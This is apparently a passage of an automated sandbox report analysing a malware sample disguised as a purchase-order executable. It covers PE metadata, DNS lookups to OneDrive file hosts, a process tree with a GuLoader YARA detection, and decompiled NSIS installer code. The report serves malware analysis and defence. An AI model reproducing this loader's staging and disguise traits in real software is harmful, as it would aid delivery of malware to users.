              IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b0 | .rdata
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

              Sections

              Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
              .text | 0x1000 | 0x6897 | 0x6a00 | False | 0.666126179245 | data | 6.45839821493 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              .rdata | 0x8000 | 0x14a6 | 0x1600 | False | 0.439275568182 | data | 5.02410928126 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .data | 0xa000 | 0x2b018 | 0x600 | False | 0.521484375 | data | 4.15458210409 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
              .ndata | 0x36000 | 0x16000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .rsrc | 0x4c000 | 0x11e0 | 0x1200 | False | 0.368489583333 | data | 4.48173978815 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

              Resources

              Name | RVA | Size | Type | Language | Country
              RT_BITMAP | 0x4c268 | 0x368 | data | English | United States
              RT_ICON | 0x4c5d0 | 0x2e8 | data | English | United States
              RT_DIALOG | 0x4c8b8 | 0x144 | data | English | United States
              RT_DIALOG | 0x4ca00 | 0x13c | data | English | United States
              RT_DIALOG | 0x4cb40 | 0x100 | data | English | United States
              RT_DIALOG | 0x4cc40 | 0x11c | data | English | United States
              RT_DIALOG | 0x4cd60 | 0xc4 | data | English | United States
              RT_DIALOG | 0x4ce28 | 0x60 | data | English | United States
              RT_GROUP_ICON | 0x4ce88 | 0x14 | data | English | United States
              RT_MANIFEST | 0x4cea0 | 0x33e | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States

              Imports

              DLL | Import
              ADVAPI32.dll | RegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
              SHELL32.dll | SHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
              ole32.dll | OleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
              COMCTL32.dll | ImageList_Create, ImageList_Destroy, ImageList_AddMasked
              USER32.dll | GetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
              GDI32.dll | SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
              KERNEL32.dll | GetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW

              Possible Origin

              Language of compilation system | Country where language is spoken | Map
              English | United States |

              Network Behavior

              Network Port Distribution

              UDP Packets

              Timestamp | Source Port | Dest Port | Source IP | Dest IP
              Dec 1, 2021 10:00:47.501432896 CET | 50339 | 53 | 192.168.2.6 | 8.8.8.8
              Dec 1, 2021 10:00:48.096002102 CET | 63307 | 53 | 192.168.2.6 | 8.8.8.8

              DNS Queries

              Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
              Dec 1, 2021 10:00:47.501432896 CET | 192.168.2.6 | 8.8.8.8 | 0x9999 | Standard query (0) | onedrive.live.com | A (IP address) | IN (0x0001)
              Dec 1, 2021 10:00:48.096002102 CET | 192.168.2.6 | 8.8.8.8 | 0xbde | Standard query (0) | ervtqq.bl.files.1drv.com | A (IP address) | IN (0x0001)

              DNS Answers

              Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
              Dec 1, 2021 10:00:47.535913944 CET | 8.8.8.8 | 192.168.2.6 | 0x9999 | No error (0) | onedrive.live.com | odc-web-geo.onedrive.akadns.net | | CNAME (Canonical name) | IN (0x0001)
              Dec 1, 2021 10:00:48.138751984 CET | 8.8.8.8 | 192.168.2.6 | 0xbde | No error (0) | ervtqq.bl.files.1drv.com | bl-files.fe.1drv.com | | CNAME (Canonical name) | IN (0x0001)
              Dec 1, 2021 10:00:48.138751984 CET | 8.8.8.8 | 192.168.2.6 | 0xbde | No error (0) | bl-files.fe.1drv.com | odc-bl-files-geo.onedrive.akadns.net | | CNAME (Canonical name) | IN (0x0001)

              System Behavior

              General

              Start time:09:58:37
              Start date:01/12/2021
              Path:C:\Users\user\Desktop\Purchase Order PO20211027STK.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\Desktop\Purchase Order PO20211027STK.exe"
              Imagebase:0x400000
              File size:131031 bytes
              MD5 hash:2F2102EC5776497950E89E419515EFEE
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:low

              General

              Start time:09:58:40
              Start date:01/12/2021
              Path:C:\Users\user\AppData\Local\Temp\SPORENE.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\AppData\Local\Temp\SPORENE.exe
              Imagebase:0x400000
              File size:21321008 bytes
              MD5 hash:582A642DF36CDAC38982E4842F370B44
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:Visual Basic
              Antivirus matches:
              • Detection: 9%, ReversingLabs
              Reputation:low

              General

              Start time:09:59:47
              Start date:01/12/2021
              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\AppData\Local\Temp\SPORENE.exe
              Imagebase:0xea0000
              File size:107624 bytes
              MD5 hash:F866FC1C2E928779C7119353C3091F0C
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000A.00000000.509732142.0000000001300000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000A.00000002.626110069.0000000001300000.00000040.00000001.sdmp, Author: Joe Security
              Reputation:moderate

              General

              Start time:09:59:49
              Start date:01/12/2021
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff61de10000
              File size:625664 bytes
              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Disassembly

              Code Analysis

                Executed Functions

                C-Code - Quality: 78%
                			_entry_() {
                				WCHAR* _v8;
                				signed int _v12;
                				void* _v16;
                				signed int _v20;
                				int _v24;
                				int _v28;
                				struct _TOKEN_PRIVILEGES _v40;
                				signed char _v42;
                				int _v44;
                				signed int _v48;
                				intOrPtr _v278;
                				signed short _v310;
                				struct _OSVERSIONINFOW _v324;
                				struct _SHFILEINFOW _v1016;
                				intOrPtr* _t88;
                				WCHAR* _t92;
                				char* _t94;
                				void _t97;
                				void* _t116;
                				WCHAR* _t118;
                				signed int _t119;
                				intOrPtr* _t123;
                				void* _t137;
                				void* _t143;
                				void* _t148;
                				void* _t152;
                				void* _t157;
                				signed int _t167;
                				void* _t170;
                				void* _t175;
                				intOrPtr _t177;
                				intOrPtr _t178;
                				intOrPtr* _t179;
                				int _t188;
                				void* _t189;
                				void* _t198;
                				signed int _t204;
                				signed int _t209;
                				signed int _t214;
                				signed int _t216;
                				int* _t218;
                				signed int _t226;
                				signed int _t229;
                				CHAR* _t231;
                				char* _t232;
                				signed int _t233;
                				WCHAR* _t234;
                				void* _t250;
                
                				_t216 = 0x20;
                				_t188 = 0;
                				_v24 = 0;
                				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
                				_v20 = 0;
                				SetErrorMode(0x8001); // executed
                				_v324.szCSDVersion = 0;
                				_v48 = 0;
                				_v44 = 0;
                				_v324.dwOSVersionInfoSize = 0x11c;
                				if(GetVersionExW( &_v324) == 0) {
                					_v324.dwOSVersionInfoSize = 0x114;
                					GetVersionExW( &_v324);
                					asm("sbb eax, eax");
                					_v42 = 4;
                					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
                				}
                				if(_v324.dwMajorVersion < 0xa) {
                					_v310 = _v310 & 0x00000000;
                				}
                				 *0x434fb8 = _v324.dwBuildNumber;
                				 *0x434fbc = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
                				if( *0x434fbe != 0x600) {
                					_t179 = E0040690A(_t188);
                					if(_t179 != _t188) {
                						 *_t179(0xc00);
                					}
                				}
                				_t231 = "UXTHEME";
                				do {
                					E0040689A(_t231); // executed
                					_t231 =  &(_t231[lstrlenA(_t231) + 1]);
                				} while ( *_t231 != 0);
                				E0040690A(0xb);
                				 *0x434f04 = E0040690A(9);
                				_t88 = E0040690A(7);
                				if(_t88 != _t188) {
                					_t88 =  *_t88(0x1e);
                					if(_t88 != 0) {
                						 *0x434fbc =  *0x434fbc | 0x00000080;
                					}
                				}
                				__imp__#17();
                				__imp__OleInitialize(_t188); // executed
                				 *0x434fc0 = _t88;
                				SHGetFileInfoW(0x42b228, _t188,  &_v1016, 0x2b4, _t188); // executed
                				E0040653D(0x433f00, L"NSIS Error");
                				_t92 = GetCommandLineW();
                				_t232 = L"\"C:\\Users\\engineer\\Desktop\\Purchase Order PO20211027STK.exe\" ";
                				E0040653D(_t232, _t92);
                				_t94 = _t232;
                				_t233 = 0x22;
                				 *0x434f00 = 0x400000;
                				_t250 = L"\"C:\\Users\\engineer\\Desktop\\Purchase Order PO20211027STK.exe\" " - _t233; // 0x22
                				if(_t250 == 0) {
                					_t216 = _t233;
                					_t94 =  &M00440002;
                				}
                				_t198 = CharNextW(E00405E39(_t94, _t216));
                				_v16 = _t198;
                				while(1) {
                					_t97 =  *_t198;
                					_t251 = _t97 - _t188;
                					if(_t97 == _t188) {
                						break;
                					}
                					_t209 = 0x20;
                					__eflags = _t97 - _t209;
                					if(_t97 != _t209) {
                						L17:
                						__eflags =  *_t198 - _t233;
                						_v12 = _t209;
                						if( *_t198 == _t233) {
                							_v12 = _t233;
                							_t198 = _t198 + 2;
                							__eflags = _t198;
                						}
                						__eflags =  *_t198 - 0x2f;
                						if( *_t198 != 0x2f) {
                							L32:
                							_t198 = E00405E39(_t198, _v12);
                							__eflags =  *_t198 - _t233;
                							if(__eflags == 0) {
                								_t198 = _t198 + 2;
                								__eflags = _t198;
                							}
                							continue;
                						} else {
                							_t198 = _t198 + 2;
                							__eflags =  *_t198 - 0x53;
                							if( *_t198 != 0x53) {
                								L24:
                								asm("cdq");
                								asm("cdq");
                								_t214 = L"NCRC" & 0x0000ffff;
                								asm("cdq");
                								_t226 = ( *0x40a2c2 & 0x0000ffff) << 0x00000010 |  *0x40a2c0 & 0x0000ffff | _t214;
                								__eflags =  *_t198 - (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t214);
                								if( *_t198 != (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t214)) {
                									L29:
                									asm("cdq");
                									asm("cdq");
                									_t209 = L" /D=" & 0x0000ffff;
                									asm("cdq");
                									_t229 = ( *0x40a2b6 & 0x0000ffff) << 0x00000010 |  *0x40a2b4 & 0x0000ffff | _t209;
                									__eflags =  *(_t198 - 4) - (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t209);
                									if( *(_t198 - 4) != (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t209)) {
                										L31:
                										_t233 = 0x22;
                										goto L32;
                									}
                									__eflags =  *_t198 - _t229;
                									if( *_t198 == _t229) {
                										 *(_t198 - 4) = _t188;
                										__eflags = _t198;
                										E0040653D(L"C:\\Users\\engineer\\AppData\\Local\\Temp", _t198);
                										L37:
                										_t234 = L"C:\\Users\\engineer\\AppData\\Local\\Temp\\";
                										GetTempPathW(0x400, _t234);
                										_t116 = E004034FC(_t198, _t251);
                										_t252 = _t116;
                										if(_t116 != 0) {
                											L40:
                											DeleteFileW(L"1033"); // executed
                											_t118 = E0040307D(_t254, _v20); // executed
                											_v8 = _t118;
                											if(_t118 != _t188) {
                												L68:
                												ExitProcess(); // executed
                												__imp__OleUninitialize(); // executed
                												if(_v8 == _t188) {
                													if( *0x434f94 == _t188) {
                														L77:
                														_t119 =  *0x434fac;
                														if(_t119 != 0xffffffff) {
                															_v24 = _t119;
                														}
                														ExitProcess(_v24);
                													}
                													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
                														LookupPrivilegeValueW(_t188, L"SeShutdownPrivilege",  &(_v40.Privileges));
                														_v40.PrivilegeCount = 1;
                														_v28 = 2;
                														AdjustTokenPrivileges(_v16, _t188,  &_v40, _t188, _t188, _t188);
                													}
                													_t123 = E0040690A(4);
                													if(_t123 == _t188) {
                														L75:
                														if(ExitWindowsEx(2, 0x80040002) != 0) {
                															goto L77;
                														}
                														goto L76;
                													} else {
                														_push(0x80040002);
                														_push(0x25);
                														_push(_t188);
                														_push(_t188);
                														_push(_t188);
                														if( *_t123() == 0) {
                															L76:
                															E0040140B(9);
                															goto L77;
                														}
                														goto L75;
                													}
                												}
                												E00405B9D(_v8, 0x200010);
                												ExitProcess(2);
                											}
                											if( *0x434f1c == _t188) {
                												L51:
                												 *0x434fac =  *0x434fac | 0xffffffff;
                												_v24 = E00403BEC(_t264);
                												goto L68;
                											}
                											_t218 = E00405E39(L"\"C:\\Users\\engineer\\Desktop\\Purchase Order PO20211027STK.exe\" ", _t188);
                											if(_t218 < L"\"C:\\Users\\engineer\\Desktop\\Purchase Order PO20211027STK.exe\" ") {
                												L48:
                												_t263 = _t218 - L"\"C:\\Users\\engineer\\Desktop\\Purchase Order PO20211027STK.exe\" ";
                												_v8 = L"Error launching installer";
                												if(_t218 < L"\"C:\\Users\\engineer\\Desktop\\Purchase Order PO20211027STK.exe\" ") {
                													_t189 = E00405B08(__eflags);
                													lstrcatW(_t234, L"~nsu");
                													__eflags = _t189;
                													if(_t189 != 0) {
                														lstrcatW(_t234, "A");
                													}
                													lstrcatW(_t234, L".tmp");
                													_t219 = L"C:\\Users\\engineer\\Desktop";
                													_t137 = lstrcmpiW(_t234, L"C:\\Users\\engineer\\Desktop");
                													__eflags = _t137;
                													if(_t137 == 0) {
                														L67:
                														_t188 = 0;
                														__eflags = 0;
                														goto L68;
                													} else {
                														__eflags = _t189;
                														_push(_t234);
                														if(_t189 == 0) {
                															E00405AEB();
                														} else {
                															E00405A6E();
                														}
                														SetCurrentDirectoryW(_t234);
                														__eflags = L"C:\\Users\\engineer\\AppData\\Local\\Temp"; // 0x43
                														if(__eflags == 0) {
                															E0040653D(L"C:\\Users\\engineer\\AppData\\Local\\Temp", _t219);
                														}
                														E0040653D(0x436000, _v16);
                														_t201 = "A" & 0x0000ffff;
                														_t143 = ( *0x40a25a & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
                														__eflags = _t143;
                														_v12 = 0x1a;
                														 *0x436800 = _t143;
                														do {
                															E0040657A(0, 0x42aa28, _t234, 0x42aa28,  *((intOrPtr*)( *0x434f10 + 0x120)));
                															DeleteFileW(0x42aa28);
                															__eflags = _v8;
                															if(_v8 != 0) {
                																_t148 = CopyFileW(0x443800, 0x42aa28, 1);
                																__eflags = _t148;
                																if(_t148 != 0) {
                																	E004062FD(_t201, 0x42aa28, 0);
                																	E0040657A(0, 0x42aa28, _t234, 0x42aa28,  *((intOrPtr*)( *0x434f10 + 0x124)));
                																	_t152 = E00405B20(0x42aa28);
                																	__eflags = _t152;
                																	if(_t152 != 0) {
                																		CloseHandle(_t152);
                																		_v8 = 0;
                																	}
                																}
                															}
                															 *0x436800 =  *0x436800 + 1;
                															_t61 =  &_v12;
                															 *_t61 = _v12 - 1;
                															__eflags =  *_t61;
                														} while ( *_t61 != 0);
                														E004062FD(_t201, _t234, 0);
                														goto L67;
                													}
                												}
                												 *_t218 = _t188;
                												_t221 =  &(_t218[2]);
                												_t157 = E00405F14(_t263,  &(_t218[2]));
                												_t264 = _t157;
                												if(_t157 == 0) {
                													goto L68;
                												}
                												E0040653D(L"C:\\Users\\engineer\\AppData\\Local\\Temp", _t221);
                												E0040653D(L"C:\\Users\\engineer\\AppData\\Local\\Temp", _t221);
                												_v8 = _t188;
                												goto L51;
                											}
                											asm("cdq");
                											asm("cdq");
                											asm("cdq");
                											_t204 = ( *0x40a27e & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
                											_t167 = ( *0x40a282 & 0x0000ffff) << 0x00000010 |  *0x40a280 & 0x0000ffff | (_t209 << 0x00000020 |  *0x40a282 & 0x0000ffff) << 0x10;
                											while( *_t218 != _t204 || _t218[1] != _t167) {
                												_t218 = _t218;
                												if(_t218 >= L"\"C:\\Users\\engineer\\Desktop\\Purchase Order PO20211027STK.exe\" ") {
                													continue;
                												}
                												break;
                											}
                											_t188 = 0;
                											goto L48;
                										}
                										GetWindowsDirectoryW(_t234, 0x3fb);
                										lstrcatW(_t234, L"\\Temp");
                										_t170 = E004034FC(_t198, _t252);
                										_t253 = _t170;
                										if(_t170 != 0) {
                											goto L40;
                										}
                										GetTempPathW(0x3fc, _t234);
                										lstrcatW(_t234, L"Low");
                										SetEnvironmentVariableW(L"TEMP", _t234);
                										SetEnvironmentVariableW(L"TMP", _t234);
                										_t175 = E004034FC(_t198, _t253);
                										_t254 = _t175;
                										if(_t175 == 0) {
                											goto L68;
                										}
                										goto L40;
                									}
                									goto L31;
                								}
                								__eflags =  *((intOrPtr*)(_t198 + 4)) - _t226;
                								if( *((intOrPtr*)(_t198 + 4)) != _t226) {
                									goto L29;
                								}
                								_t177 =  *((intOrPtr*)(_t198 + 8));
                								__eflags = _t177 - 0x20;
                								if(_t177 == 0x20) {
                									L28:
                									_t36 =  &_v20;
                									 *_t36 = _v20 | 0x00000004;
                									__eflags =  *_t36;
                									goto L29;
                								}
                								__eflags = _t177 - _t188;
                								if(_t177 != _t188) {
                									goto L29;
                								}
                								goto L28;
                							}
                							_t178 =  *((intOrPtr*)(_t198 + 2));
                							__eflags = _t178 - _t209;
                							if(_t178 == _t209) {
                								L23:
                								 *0x434fa0 = 1;
                								goto L24;
                							}
                							__eflags = _t178 - _t188;
                							if(_t178 != _t188) {
                								goto L24;
                							}
                							goto L23;
                						}
                					} else {
                						goto L16;
                					}
                					do {
                						L16:
                						_t198 = _t198 + 2;
                						__eflags =  *_t198 - _t209;
                					} while ( *_t198 == _t209);
                					goto L17;
                				}
                				goto L37;
                			}

                APIs
                • SetErrorMode.KERNELBASE(00008001), ref: 00403550
                • GetVersionExW.KERNEL32(?), ref: 00403579
                • GetVersionExW.KERNEL32(0000011C), ref: 00403590
                • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403627
                • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403663
                • OleInitialize.OLE32(00000000), ref: 0040366A
                • SHGetFileInfoW.SHELL32(0042B228,00000000,?,000002B4,00000000), ref: 00403688
                • GetCommandLineW.KERNEL32(00433F00,NSIS Error), ref: 0040369D
                • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Purchase Order PO20211027STK.exe" ,00000020,"C:\Users\user\Desktop\Purchase Order PO20211027STK.exe" ,00000000), ref: 004036D6
                • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 00403809
                • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040381A
                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403826
                • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040383A
                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403842
                • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403853
                • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040385B
                • DeleteFileW.KERNELBASE(1033), ref: 0040386F
                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403956
                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 00403965
                  • Part of subcall function 00405AEB: CreateDirectoryW.KERNELBASE(?,00000000,00403520,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405AF1
                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403970
                • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Purchase Order PO20211027STK.exe" ,00000000,?), ref: 0040397C
                • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 0040399C
                • DeleteFileW.KERNEL32(0042AA28,0042AA28,?,00436000,?), ref: 004039FB
                • CopyFileW.KERNEL32(00443800,0042AA28,00000001), ref: 00403A0E
                • CloseHandle.KERNEL32(00000000,0042AA28,0042AA28,?,0042AA28,00000000), ref: 00403A3B
                • ExitProcess.KERNEL32(?), ref: 00403A59
                • OleUninitialize.OLE32(?), ref: 00403A5E
                • ExitProcess.KERNEL32 ref: 00403A78
                • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403A8C
                • OpenProcessToken.ADVAPI32(00000000), ref: 00403A93
                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AA7
                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403AC6
                • ExitWindowsEx.USER32(00000002,80040002), ref: 00403AEB
                • ExitProcess.KERNEL32 ref: 00403B0C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID: Processlstrcat$ExitFile$Directory$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                • String ID: "C:\Users\user\Desktop\Purchase Order PO20211027STK.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                • API String ID: 2292928366-2592734327
                • Opcode ID: 8d24a3590c3fa0910ef95ef3363b7165c5538ed9a562f2e07edb708d24b89e61
                • Instruction ID: 4d4dc0a58e4858e72561def8a0259f0227da8af974c10a5ea2b310ef4b80d7a5
                • Opcode Fuzzy Hash: 8d24a3590c3fa0910ef95ef3363b7165c5538ed9a562f2e07edb708d24b89e61
                • Instruction Fuzzy Hash: 66E10670A00214AADB10AFB59D45BAF3AB8EF4470AF14847FF545B22D1DB7C8A41CB6D
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00406873(WCHAR* _a4) {
                				void* _t2;
                
                				_t2 = FindFirstFileW(_a4, 0x4302b8); // executed
                				if(_t2 == 0xffffffff) {
                					return 0;
                				}
                				FindClose(_t2);
                				return 0x4302b8;
                			}

                APIs
                • FindFirstFileW.KERNELBASE(747DFAA0,004302B8,0042FA70,00405F5D,0042FA70,0042FA70,00000000,0042FA70,0042FA70,747DFAA0,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,747DFAA0,C:\Users\user\AppData\Local\Temp\), ref: 0040687E
                • FindClose.KERNEL32(00000000), ref: 0040688A
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID: Find$CloseFileFirst
                • String ID:
                • API String ID: 2295610775-0
                • Opcode ID: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
                • Instruction ID: 67599a3b69382adcf67454a25bfea179debcebd0a6e2e92eb77ede12202c023a
                • Opcode Fuzzy Hash: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
                • Instruction Fuzzy Hash: C3D012325192205FC3402B386E0C84B7A989F16331726CB76B4AAF51E0D7388C7387BD
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 96%
                			E00403BEC(void* __eflags) {
                				intOrPtr _v4;
                				intOrPtr _v8;
                				int _v12;
                				void _v16;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				intOrPtr* _t22;
                				void* _t30;
                				void* _t32;
                				int _t33;
                				void* _t36;
                				int _t39;
                				int _t40;
                				int _t44;
                				short _t63;
                				WCHAR* _t65;
                				signed char _t69;
                				signed short _t73;
                				WCHAR* _t76;
                				intOrPtr _t82;
                				WCHAR* _t87;
                
                				_t82 =  *0x434f10;
                				_t22 = E0040690A(2);
                				_t90 = _t22;
                				if(_t22 == 0) {
                					_t76 = 0x42d268;
                					L"1033" = 0x30;
                					 *0x442002 = 0x78;
                					 *0x442004 = 0;
                					E0040640B(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x42d268, 0);
                					__eflags =  *0x42d268;
                					if(__eflags == 0) {
                						E0040640B(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x42d268, 0);
                					}
                					lstrcatW(L"1033", _t76);
                				} else {
                					_t73 =  *_t22(); // executed
                					E00406484(L"1033", _t73 & 0x0000ffff);
                				}
                				E00403EC2(_t78, _t90);
                				_t86 = L"C:\\Users\\engineer\\AppData\\Local\\Temp";
                				 *0x434f80 =  *0x434f18 & 0x00000020;
                				 *0x434f9c = 0x10000;
                				if(E00405F14(_t90, L"C:\\Users\\engineer\\AppData\\Local\\Temp") != 0) {
                					L16:
                					if(E00405F14(_t98, _t86) == 0) {
                						E0040657A(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118)));
                					}
                					_t30 = LoadImageW( *0x434f00, 0x67, 1, 0, 0, 0x8040); // executed
                					 *0x433ee8 = _t30;
